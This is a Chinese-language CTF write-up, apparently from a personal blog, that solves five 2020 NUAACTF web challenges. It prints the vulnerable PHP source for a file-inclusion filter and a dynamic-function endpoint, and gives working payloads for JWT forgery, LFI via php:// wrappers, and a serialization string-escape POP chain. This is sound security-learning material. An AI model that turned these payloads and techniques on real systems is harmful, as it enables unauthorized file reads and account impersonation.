2020-NUAACTF-Web-writeup

本文首发于Leon的Blog，如需转载请注明原地址并联系作者

都是简单题，简单写一写

 

 

web1-checkin

F12得到flag

nuaactf{we1cOme_to_NuaAcTF}

web2-jwt

根据题目，登录后抓包看见jwt，base64解一下看见格式，然后爆破secret，最后username构造为admin伪造jwt即可：

nuaactf{haojiGuoGuoTql}

web3-easypop

题目如图，payload没留

简单的反序列化，将lemon类的$ClassObj实例化为evil类即可

nuaactf{you_can_really_p0p}

web4-command

F12源码看见include.php，访问之，url出现?file=index

简单的文件包含，用伪协议读读include.php源码：

//include.php
<?php  error_reporting(0);
@$file = $_GET["file"];
if(isset($file)) {
  if (preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) {
    echo "<p> error! </p>";
  } else {
    include($file.'.php');
    setcookie("tips","createfun.php");
  }
} else {
  header('Location:include.php?file=index');
}
?>

发现提示createfun.php，继续读：

<?php
$func = @$_GET['func'];
$arg = @$_GET['arg'];
if(isset($func)&&isset($arg)){$func($arg,'');}

直接payload：createfun.php?func=show_source&arg=flag.php

得到：

<?php
$flag="nuaactf{php_IS_thE_best_language}";
?>

web5

直接就安恒4月赛的原题，改过了replace

原题见本站：https://clq0.top/2020/05/minil-ctf/#ezbypass

源码：

<?php

show_source("index.php");

function filter_nohack($data) {
    return str_replace('flag', '', $data);

}

class A{
    public $username;
    public $password;
    function __construct($a, $b){
        $this->username = $a;
        $this->password = $b;
    }
}
class B{
    public $b = 'gqy';
    function __destruct(){
        $c = 'a'.$this->b;
        echo $c;
    }
}
class C{
    public $c;
    function __toString(){
        //flag.php
        echo file_get_contents($this->c);
       return 'nice';
    }

}

$a = new A($_GET['a'],$_GET['b']);

$b = unserialize(filter_nohack(serialize($a)));

这里直接是将flag置空，4字符变0字符，根据原题目的payload，因为要吞掉后面23个字符，4*6=24，所以前面构造6个flag，后面补一个字符，然后flag.php的flag要双写

payload：?a=flagflagflagflagflagflag&b=A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flflagag.php";}}

flag{you_can_readlly_dance}

 php反序列化逃逸 / 文件包含